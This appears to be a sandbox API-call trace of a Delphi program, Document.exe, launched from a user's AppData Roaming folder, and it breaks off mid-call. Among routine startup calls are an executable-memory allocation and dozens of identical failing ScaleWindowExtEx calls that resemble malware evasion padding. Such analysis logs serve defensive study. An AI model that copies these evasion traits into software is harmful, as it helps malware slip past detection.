[0213.780] CreatePalette (plpal=0x18fb30) returned 0x79080997 [0213.780] GetStockObject (i=7) returned 0x1b00017 [0213.780] GetStockObject (i=5) returned 0x1900015 [0213.780] GetStockObject (i=13) returned 0x18a002e [0213.780] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0213.780] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11 [0213.781] LoadStringA (in: hInstance=0x400000, uID=0xff34, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4 [0213.781] LoadStringA (in: hInstance=0x400000, uID=0xff33, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5 [0213.781] LoadStringA (in: hInstance=0x400000, uID=0xff32, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6 [0213.781] LoadStringA (in: hInstance=0x400000, uID=0xff31, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3 [0213.781] LoadStringA (in: hInstance=0x400000, uID=0xff30, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3 [0213.781] LoadStringA (in: hInstance=0x400000, uID=0xff4f, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4 [0213.781] LoadStringA (in: hInstance=0x400000, uID=0xff4e, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5 [0213.781] LoadStringA (in: hInstance=0x400000, uID=0xff4d, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2 [0213.781] LoadStringA (in: hInstance=0x400000, uID=0xff4c, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4 [0213.781] LoadStringA (in: hInstance=0x400000, uID=0xff4b, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4 [0213.781] LoadStringA (in: hInstance=0x400000, uID=0xff4a, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3 [0213.781] LoadStringA (in: hInstance=0x400000, uID=0xff49, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4 [0213.781] LoadStringA (in: hInstance=0x400000, uID=0xff48, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4 [0213.781] LoadStringA (in: hInstance=0x400000, uID=0xff47, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5 [0213.781] LoadStringA (in: hInstance=0x400000, uID=0xff46, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5 [0213.781] LoadStringA (in: hInstance=0x400000, uID=0xff45, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3 [0213.781] LoadStringA (in: hInstance=0x400000, uID=0xff44, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3 [0213.781] LoadStringA (in: hInstance=0x400000, uID=0xff43, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4 [0213.782] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0e7 [0213.782] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0f8 [0213.782] GetCurrentThreadId () returned 0xb84 [0213.782] GlobalAddAtomA (lpString="WndProcPtr0040000000000B84") returned 0xc11c [0213.783] LoadStringA (in: hInstance=0x400000, uID=0xfef3, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb [0213.783] LoadStringA (in: hInstance=0x400000, uID=0xfef2, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc [0213.783] LoadStringA (in: hInstance=0x400000, uID=0xfef1, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11 [0213.783] LoadStringA (in: hInstance=0x400000, uID=0xfef0, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8 [0213.783] LoadStringA (in: hInstance=0x400000, uID=0xff0f, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe [0213.783] LoadStringA (in: hInstance=0x400000, uID=0xff0e, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa [0213.783] LoadStringA (in: hInstance=0x400000, uID=0xff0d, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4 [0213.783] LoadStringA (in: hInstance=0x400000, uID=0xff0c, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9 [0213.783] LoadStringA (in: hInstance=0x400000, uID=0xff0b, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf [0213.783] LoadStringA (in: hInstance=0x400000, uID=0xff0a, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9 [0213.783] LoadStringA (in: hInstance=0x400000, uID=0xff09, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf [0214.061] LoadStringA (in: hInstance=0x400000, uID=0xff08, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15 [0214.061] LoadStringA (in: hInstance=0x400000, uID=0xff07, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10 [0214.061] LoadStringA (in: hInstance=0x400000, uID=0xff06, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf [0214.061] LoadStringA (in: hInstance=0x400000, uID=0xff05, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe [0214.062] LoadStringA (in: hInstance=0x400000, uID=0xff04, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14 [0214.062] LoadStringA (in: hInstance=0x400000, uID=0xff03, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9 [0214.062] LoadStringA (in: hInstance=0x400000, uID=0xff02, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7 [0214.062] LoadStringA (in: hInstance=0x400000, uID=0xff01, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc [0214.062] LoadStringA (in: hInstance=0x400000, uID=0xff00, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb [0214.062] LoadStringA (in: hInstance=0x400000, uID=0xff1f, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd [0214.062] LoadStringA (in: hInstance=0x400000, uID=0xff1e, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10 [0214.062] LoadStringA (in: hInstance=0x400000, uID=0xff1d, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb [0214.062] LoadStringA (in: hInstance=0x400000, uID=0xff1c, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa [0214.062] LoadStringA (in: hInstance=0x400000, uID=0xff1b, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15 [0214.062] LoadStringA (in: hInstance=0x400000, uID=0xff1a, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe [0214.062] LoadStringA (in: hInstance=0x400000, uID=0xff19, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd [0214.062] LoadStringA (in: hInstance=0x400000, uID=0xff18, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb [0214.062] LoadStringA (in: hInstance=0x400000, uID=0xff17, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5 [0214.062] LoadStringA (in: hInstance=0x400000, uID=0xff16, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8 [0214.062] LoadStringA (in: hInstance=0x400000, uID=0xff15, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb [0214.062] LoadStringA (in: hInstance=0x400000, uID=0xff14, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5 [0214.062] LoadStringA (in: hInstance=0x400000, uID=0xff13, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4 [0214.062] LoadStringA (in: hInstance=0x400000, uID=0xff12, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7 [0214.062] LoadStringA (in: hInstance=0x400000, uID=0xff11, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4 [0214.062] LoadStringA (in: hInstance=0x400000, uID=0xff10, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6 [0214.062] LoadStringA (in: hInstance=0x400000, uID=0xff2f, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4 [0214.062] LoadStringA (in: hInstance=0x400000, uID=0xff2e, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3 [0214.062] LoadStringA (in: hInstance=0x400000, uID=0xff2d, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6 [0214.062] LoadStringA (in: hInstance=0x400000, uID=0xff2c, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4 [0214.062] LoadStringA (in: hInstance=0x400000, uID=0xff2b, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4 [0214.062] LoadStringA (in: hInstance=0x400000, uID=0xff2a, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6 [0214.062] LoadStringA (in: hInstance=0x400000, uID=0xff29, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4 [0214.062] LoadStringA (in: hInstance=0x400000, uID=0xff28, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5 [0214.062] LoadStringA (in: hInstance=0x400000, uID=0xff27, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5 [0214.062] LoadStringA (in: hInstance=0x400000, uID=0xff26, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6 [0214.062] LoadStringA (in: hInstance=0x400000, uID=0xff25, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5 [0214.063] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc1e8 [0214.063] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc1e9 [0214.063] GetVersion () returned 0x1db10106 [0214.063] GetCurrentProcessId () returned 0xb6c [0214.063] GlobalAddAtomA (lpString="Delphi00000B6C") returned 0xc11b [0214.063] GetCurrentThreadId () returned 0xb84 [0214.063] GlobalAddAtomA (lpString="ControlOfs0040000000000B84") returned 0xc034 [0214.063] RegisterClipboardFormatA (lpszFormat="ControlOfs0040000000000B84") returned 0xc1c2 [0214.063] GetProcAddress (hModule=0x77820000, lpProcName="GetMonitorInfoA") returned 0x77844413 [0214.063] GetProcAddress (hModule=0x77820000, lpProcName="GetSystemMetrics") returned 0x77837d2f [0214.063] GetSystemMetrics (nIndex=19) returned 1 [0214.109] GetSystemMetrics (nIndex=75) returned 1 [0214.109] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x1dd1320, fWinIni=0x0 | out: pvParam=0x1dd1320) returned 1 [0214.110] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0214.110] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015 [0214.110] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ff9) returned 0xa028d [0214.110] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b [0214.110] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019 [0214.110] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017 [0214.110] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffa) returned 0x1102b7 [0214.111] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffb) returned 0x12026b [0214.112] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffc) returned 0x30008d [0214.112] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffd) returned 0xe0187 [0214.112] LoadCursorA (hInstance=0x400000, lpCursorName=0x7fff) returned 0x130109 [0214.112] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffe) returned 0x60269 [0214.112] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0214.112] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b [0214.112] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011 [0214.112] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d [0214.112] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013 [0214.112] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f [0214.112] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015 [0214.113] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005 [0214.113] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009 [0214.113] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0214.113] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0214.113] GetDC (hWnd=0x0) returned 0x6401089b [0214.113] GetDeviceCaps (hdc=0x6401089b, index=90) returned 96 [0214.113] ReleaseDC (hWnd=0x0, hDC=0x6401089b) returned 1 [0214.113] GetProcAddress (hModule=0x77820000, lpProcName="EnumDisplayMonitors") returned 0x7784451a [0214.113] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x4564bc, dwData=0x1dd156c) returned 1 [0214.113] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x18fe97, fWinIni=0x0 | out: pvParam=0x18fe97) returned 1 [0214.113] CreateFontIndirectA (lplf=0x18fe97) returned 0x130a09af [0214.113] GetObjectA (in: h=0x130a09af, c=60, pv=0x18fc88 | out: pv=0x18fc88) returned 60 [0214.114] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x18fd43, fWinIni=0x0 | out: pvParam=0x18fd43) returned 1 [0214.114] CreateFontIndirectA (lplf=0x18fe1f) returned 0x570a078e [0214.114] GetObjectA (in: h=0x570a078e, c=60, pv=0x18fc88 | out: pv=0x18fc88) returned 60 [0214.114] CreateFontIndirectA (lplf=0x18fde3) returned 0x9f0a09c6 [0214.114] GetObjectA (in: h=0x9f0a09c6, c=60, pv=0x18fc88 | out: pv=0x18fc88) returned 60 [0214.114] LoadIconA (hInstance=0x400000, lpIconName="MAINICON") returned 0x2002c5 [0214.117] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x18fdf7, nSize=0x100 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\document\\document.exe")) returned 0x37 [0214.117] OemToCharA (in: pSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe", pDst=0x18fdf7 | out: pDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe") returned 1 [0214.117] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x210000 [0214.117] GetClassInfoA (in: hInstance=0x400000, lpClassName="TApplication", lpWndClass=0x18fdac | out: lpWndClass=0x18fdac) returned 0 [0214.117] RegisterClassA (lpWndClass=0x45fe1c) returned 0xc5c1f1 [0214.117] GetSystemMetrics (nIndex=0) returned 1440 [0214.117] GetSystemMetrics (nIndex=1) returned 900 [0214.117] CreateWindowExA (dwExStyle=0x0, lpClassName="TApplication", lpWindowName="Document", dwStyle=0x84ca0000, X=720, Y=450, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x50196 [0214.122] SetWindowLongA (hWnd=0x50196, nIndex=-4, dwNewLong=2166767) returned 4219680 [0214.122] SendMessageA (hWnd=0x50196, Msg=0x80, wParam=0x1, lParam=0x2002c5) returned 0x0 [0214.122] NtdllDefWindowProc_A (hWnd=0x50196, Msg=0x80, wParam=0x1, lParam=0x2002c5) returned 0x0 [0214.133] NtdllDefWindowProc_A (hWnd=0x50196, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x60289 [0214.134] SetClassLongA (hWnd=0x50196, nIndex=-14, dwNewLong=2097861) returned 0x0 [0214.134] GetSystemMenu (hWnd=0x50196, bRevert=0) returned 0xa02b5 [0214.136] DeleteMenu (hMenu=0xa02b5, uPosition=0xf030, uFlags=0x0) returned 1 [0214.136] DeleteMenu (hMenu=0xa02b5, uPosition=0xf000, uFlags=0x0) returned 1 [0214.136] DeleteMenu (hMenu=0xa02b5, uPosition=0xf010, uFlags=0x0) returned 1 [0214.136] GetKeyboardLayoutList (in: nBuff=64, lpList=0x18fd78 | out: lpList=0x18fd78) returned 1 [0214.137] GetModuleHandleA (lpModuleName="USER32") returned 0x77820000 [0214.137] GetProcAddress (hModule=0x77820000, lpProcName="AnimateWindow") returned 0x7784b531 [0214.138] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x75460000 [0214.138] GetProcAddress (hModule=0x75460000, lpProcName="InitializeFlatSB") returned 0x7549266f [0214.138] GetProcAddress (hModule=0x75460000, lpProcName="UninitializeFlatSB") returned 0x75492542 [0214.138] GetProcAddress (hModule=0x75460000, lpProcName="FlatSB_GetScrollProp") returned 0x75491d29 [0214.138] GetProcAddress (hModule=0x75460000, lpProcName="FlatSB_SetScrollProp") returned 0x7549238d [0214.138] GetProcAddress (hModule=0x75460000, lpProcName="FlatSB_EnableScrollBar") returned 0x754920c9 [0214.139] GetProcAddress (hModule=0x75460000, lpProcName="FlatSB_ShowScrollBar") returned 0x75491fdb [0214.139] GetProcAddress (hModule=0x75460000, lpProcName="FlatSB_GetScrollRange") returned 0x75491e8d [0214.139] GetProcAddress (hModule=0x75460000, lpProcName="FlatSB_GetScrollInfo") returned 0x75491f0f [0214.139] GetProcAddress (hModule=0x75460000, lpProcName="FlatSB_GetScrollPos") returned 0x75491ccd [0214.139] GetProcAddress (hModule=0x75460000, lpProcName="FlatSB_SetScrollPos") returned 0x7549216d [0214.139] GetProcAddress (hModule=0x75460000, lpProcName="FlatSB_SetScrollInfo") returned 0x754922be [0214.139] GetProcAddress (hModule=0x75460000, lpProcName="FlatSB_SetScrollRange") returned 0x754921e2 [0214.139] GetModuleHandleA (lpModuleName="User32.dll") returned 0x77820000 [0214.139] GetProcAddress (hModule=0x77820000, lpProcName="SetLayeredWindowAttributes") returned 0x7785ec88 [0214.139] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc0bf [0214.139] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18fe2c, nSize=0xff | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\document\\document.exe")) returned 0x37 [0214.139] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.139] GetLastError () returned 0x6 [0214.139] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.139] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.139] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.139] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.139] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.139] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.139] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.139] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.139] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.139] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.139] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.139] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.139] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.139] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.140] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.140] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.140] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.140] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.140] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.140] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.140] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.140] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.140] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.140] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.140] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.140] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.140] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.140] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.140] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.140] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.140] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.140] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.140] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.140] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.140] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.140] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.140] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.140] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.140] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.140] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.140] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.140] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.140] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.140] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.140] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.140] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.140] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.140] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.140] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.140] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.140] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.140] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.140] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.140] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.140] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.140] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.140] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.140] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.140] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.140] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.141] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.141] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.141] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.141] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0214.141] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 